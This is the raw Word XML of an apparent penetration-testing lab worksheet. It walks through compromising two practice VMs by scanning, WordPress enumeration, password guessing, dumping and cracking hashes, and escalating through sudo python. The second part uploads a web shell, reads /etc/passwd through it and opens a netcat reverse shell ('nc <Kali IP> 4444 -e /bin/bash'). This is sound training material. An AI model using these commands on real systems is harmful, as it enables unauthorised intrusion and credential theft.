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82F3E5" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>Complete the following high-level steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD38DAD" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>1. Scan the network to identify the IP addresses of Target 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EF1EDB" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="237E714E" wp14:editId="44CD7F1F">
            <wp:extent cx="5705475" cy="4381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05475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F9ECF" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A92B489" wp14:editId="0924B14F">
            <wp:extent cx="5943600" cy="46164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1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C5095" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>IP 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AC0E65" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>2. Document all exposed ports and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B0D6E3" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>22/tcp ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B30A406" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>80/tcp http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741157B0" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>111/tcp rpcbind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585DEF26" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>139/tcp smb 3.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AC7A85" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>445/tcp smb 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E50181" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FB2C664" wp14:editId="6871C7FD">
            <wp:extent cx="5943600" cy="46367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3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78CC1" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>3. Enumerate the WordPress site. One flag is discoverable after this step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5F8840" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">     - **Hint**: Look for the `Users` section in the output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFAEBAC" w14:textId="77777777" w:rsidR="00FA02A7" w:rsidRDefault="00FA02A7" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="701210B2" wp14:editId="00176A10">
            <wp:extent cx="5934075" cy="27813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34075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FF8F5" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00FA02A7" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D4CA2C9" wp14:editId="200DAAA0">
            <wp:extent cx="5943600" cy="125539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E8FD2" w14:textId="77777777" w:rsidR="00284CCD" w:rsidRDefault="00284CCD" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="475786AE" wp14:editId="03D690CA">
            <wp:extent cx="4848225" cy="5810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48225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02357" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>4. Use SSH to gain a user shell. Two flags can be discovered at this step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A86EFC" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">     - **Hint**: Guess `michael`'s password. What's the most obvious possible guess?...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB6AF99" w14:textId="77777777" w:rsidR="00C30ACF" w:rsidRDefault="00C30ACF" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="597D451C" wp14:editId="35D13810">
            <wp:extent cx="5153025" cy="55721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557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B4DFB" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00C30ACF" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36607F13" wp14:editId="2EF7DDC3">
            <wp:extent cx="5934075" cy="14001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34075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B8860" w14:textId="77777777" w:rsidR="00E05255" w:rsidRDefault="00E05255" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76033DDB" wp14:editId="7568E75A">
            <wp:extent cx="4171950" cy="10191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71950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B9DD1" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>5. Find the MySQL database password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC25E0C" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">     - **Hint**: Look for a `wp-config.php` file in `/var/www/html`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319EEDC4" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00E05255" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54805E02" wp14:editId="5BA3455F">
            <wp:extent cx="3143250" cy="16859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43250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45856" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>6. Use the credentials to log into MySQL and dump WordPress user password hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8DB6CE" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="002F4233" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21A934C4" wp14:editId="735A0237">
            <wp:extent cx="5943600" cy="229108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AD554" w14:textId="77777777" w:rsidR="006A4B8B" w:rsidRDefault="006A4B8B" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F13EEF7" wp14:editId="1AC364A8">
            <wp:extent cx="4124325" cy="5305425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53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6BEDA" w14:textId="77777777" w:rsidR="006A4B8B" w:rsidRDefault="006A4B8B" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54F93C39" wp14:editId="78884393">
            <wp:extent cx="2924175" cy="65722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24175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461AC" w14:textId="77777777" w:rsidR="006A4B8B" w:rsidRDefault="006A4B8B" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E955BAF" wp14:editId="62EB1706">
            <wp:extent cx="4619625" cy="296227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19625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3F154" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>7. Crack password hashes with `john`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FE084C" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">     - **Hint**: Start by creating a wp_hashes.txt with Steven and Michael's hashes, formatted as follows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37910AED" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="006A4B8B" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FDF21D6" wp14:editId="5E21F4B8">
            <wp:extent cx="5943600" cy="1459230"/>
            <wp:effectExtent l="0" t="0" r="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CEC3B" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">      ```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DF6DDF" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">      user1:$P$hashvalu3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0386E712" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">      user2:$P$hashvalu3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695B55F5" w14:textId="77777777" w:rsidR="006A4B8B" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">      ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFD8F96" w14:textId="77777777" w:rsidR="006A4B8B" w:rsidRDefault="006A4B8B" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57B618EC" wp14:editId="7FE70D04">
            <wp:extent cx="3571875" cy="72390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71875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A69CC" w14:textId="40BCA1D2" w:rsidR="00D14FCD" w:rsidRDefault="00E05AE5" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F98CA1C" wp14:editId="438E5F53">
            <wp:extent cx="5314950" cy="29718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1495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99E24" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>8. Secure a user shell as the user whose password you cracked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19747544" w14:textId="0C5B8BF1" w:rsidR="00D14FCD" w:rsidRDefault="00E05AE5" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F1446F6" wp14:editId="37F31DDD">
            <wp:extent cx="5895975" cy="2133600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895975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36F4C" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>9. Escalate to `root`. One flag can be discovered after this step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9175ED" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">    - **Hint**:  Check sudo privileges. Is there a python command you can use to escalate to sudo?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3665CB3B" w14:textId="5E03F3F1" w:rsidR="00D14FCD" w:rsidRDefault="0076515A" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50F3CF62" wp14:editId="2EA3D3E0">
            <wp:extent cx="5943600" cy="2472690"/>
            <wp:effectExtent l="0" t="0" r="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24DE6" w14:textId="4B63593B" w:rsidR="0076515A" w:rsidRDefault="0076515A" w:rsidP="00D14FCD"/>
    <w:p w14:paraId="3D62FCC2" w14:textId="2F7D9D7E" w:rsidR="0076515A" w:rsidRDefault="0076515A" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="010FC764" wp14:editId="5560E7EC">
            <wp:extent cx="4905375" cy="5038725"/>
            <wp:effectExtent l="0" t="0" r="9525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05375" cy="503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A3270DE" w14:textId="77777777" w:rsidR="00F5625F" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Try to complete all of these steps. However, you may move on after capturing only _two_ of the four flags if you run out of time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C20FE10" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD"/>
    <w:p w14:paraId="18BFB11D" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>#### Attacking Target 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFA5E69" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD"/>
    <w:p w14:paraId="7C049072" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD"/>
    <w:p w14:paraId="56266F5B" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>Please note, you **attacking Target 2 is not required**. It is included as an additional challenge if you are interested in assessing a more complex web application. Before attempting this challenge, you should first complete the Wireshark analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8ADF56" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD"/>
    <w:p w14:paraId="39A6A196" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>The steps for completing this assessment are enumerated below -- all details required to capture the first 3 flags on Target 2 are included.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4891CBF0" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD"/>
    <w:p w14:paraId="1C4984DD" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>1. Use Nmap to identify the IP address of Target 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7AE17C" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DEB593F" wp14:editId="28CBBD66">
            <wp:extent cx="5705475" cy="4381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05475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92BA9" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B2DC108" wp14:editId="1553149E">
            <wp:extent cx="5943600" cy="48539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5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CD585" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>2. Use Nmap to document all exposed ports and services at this IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22185B6F" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD"/>
    <w:p w14:paraId="1B787E94" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>3. Enumerate the web server with `nikto`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789CB1A7" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">     - **Hint**: Run: `nikto -C all -h &lt;URL&gt;`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E585538" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">     - **Note**: This creates a list of URLs the Target HTTP server exposes. What kind of website is this VM running?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCA216F" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD"/>
    <w:p w14:paraId="1E715BDE" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>4. Perform a more in-depth enumeration with `gobuster`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDE247E" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">     - **Hint**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2AF59A" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">       - Install `gobuster` using `apt`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611CEA49" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">       - Run: `gobuster -w /path/to/wordlist dir -u &lt;URL&gt;`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D54EE74" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">       - Use `/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt` as your wordlist (`-w`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4C9C40" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       - Pay attention to the `/vendor` directory. There's a `flag` in here...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C13215C" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD"/>
    <w:p w14:paraId="14F3A5A9" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD"/>
    <w:p w14:paraId="6226F2B3" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>5. Use “searchsploit” to find any known vulnerabilities associated with the programs found in Step #4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B39A09C" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">    **HINT**: Use `searchsploit -h` for some hints here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD34382" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD"/>
    <w:p w14:paraId="0FD1ACF8" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>6. Use the provided script, `exploit.sh`, to exploit this vulnerability by opening an Ncat connection to your Kali VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E5584B" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">    - Edit the line at the top of the script that sets the `TARGET` variable. Set it equal to the IP address of Target 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7929E8" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">    - Run the script. It uploads a file called `backdoor.php` to the target server. This file can be used to execute **command injection attacks**.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3949A271" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">    - Navigate to: `http://&lt;Target 2 URL&gt;/backdoor.php?cmd=&lt;CMD&gt;`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E997F3" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">      - This allows you to run bash commands on Target 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14772962" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">      - For example, try: `http://&lt;Target 2 URL&gt;/backdoor.php?cmd=cat%20/etc/passwd`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7B61DA" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">    - Next, use the backdoor to open a shell session on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A65CC73" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">      - On your **Kali** VM, start a netcat listener: `nc -lnvp 4444`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6132F8" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">      - In the browser, use the backdoor to run: `nc &lt;Kali IP&gt; 4444 -e /bin/bash`. For example, your query string will look like `cmd=nc%20&lt;Kali IP&gt;%204444%20-e%20/bin/bash`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ED09BF" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD"/>
    <w:p w14:paraId="4D9B99F6" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>7. Using the shell you've opened on `Target 2`, find a `flag` in `/var/www`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656E4755" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD"/>
    <w:p w14:paraId="52B38755" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>8. Next, find a flag in the WordPress uploads directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5BA098" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t xml:space="preserve">    - **Hint**: Use the `find` command: `find /var/www -type f -iname 'flag*'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722CC374" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD"/>
    <w:p w14:paraId="3A5329FC" w14:textId="77777777" w:rsidR="00D14FCD" w:rsidRDefault="00D14FCD" w:rsidP="00D14FCD">
      <w:r>
        <w:t>9. If you find all three flags -- congratulations! There is a fourth, but escalating to `root` is extremely difficult: For now, move on to completing a report about Target 2.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D14F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sjC0NLY0NjYyMLdU0lEKTi0uzszPAykwqgUArJXMSiwAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00D14FCD"/>
    <w:rsid w:val="00284CCD"/>
    <w:rsid w:val="002F4233"/>
    <w:rsid w:val="00654BEA"/>
    <w:rsid w:val="006A4B8B"/>
    <w:rsid w:val="0076515A"/>
    <w:rsid w:val="00C30ACF"/>
    <w:rsid w:val="00D14FCD"/>
    <w:rsid w:val="00E05255"/>
    <w:rsid w:val="00E05AE5"/>
    <w:rsid w:val="00F5625F"/>
    <w:rsid w:val="00FA0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E2B1AC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5607FDF8-2FE9-46E0-A2D0-CA5474CE3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216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7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2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26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95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3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0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8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44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0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4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6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5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9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2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2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1</Pages>
  <Words>584</Words>
  <Characters>332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avio Lopes</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Flavio Lopes</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-04T01:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-05T00:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>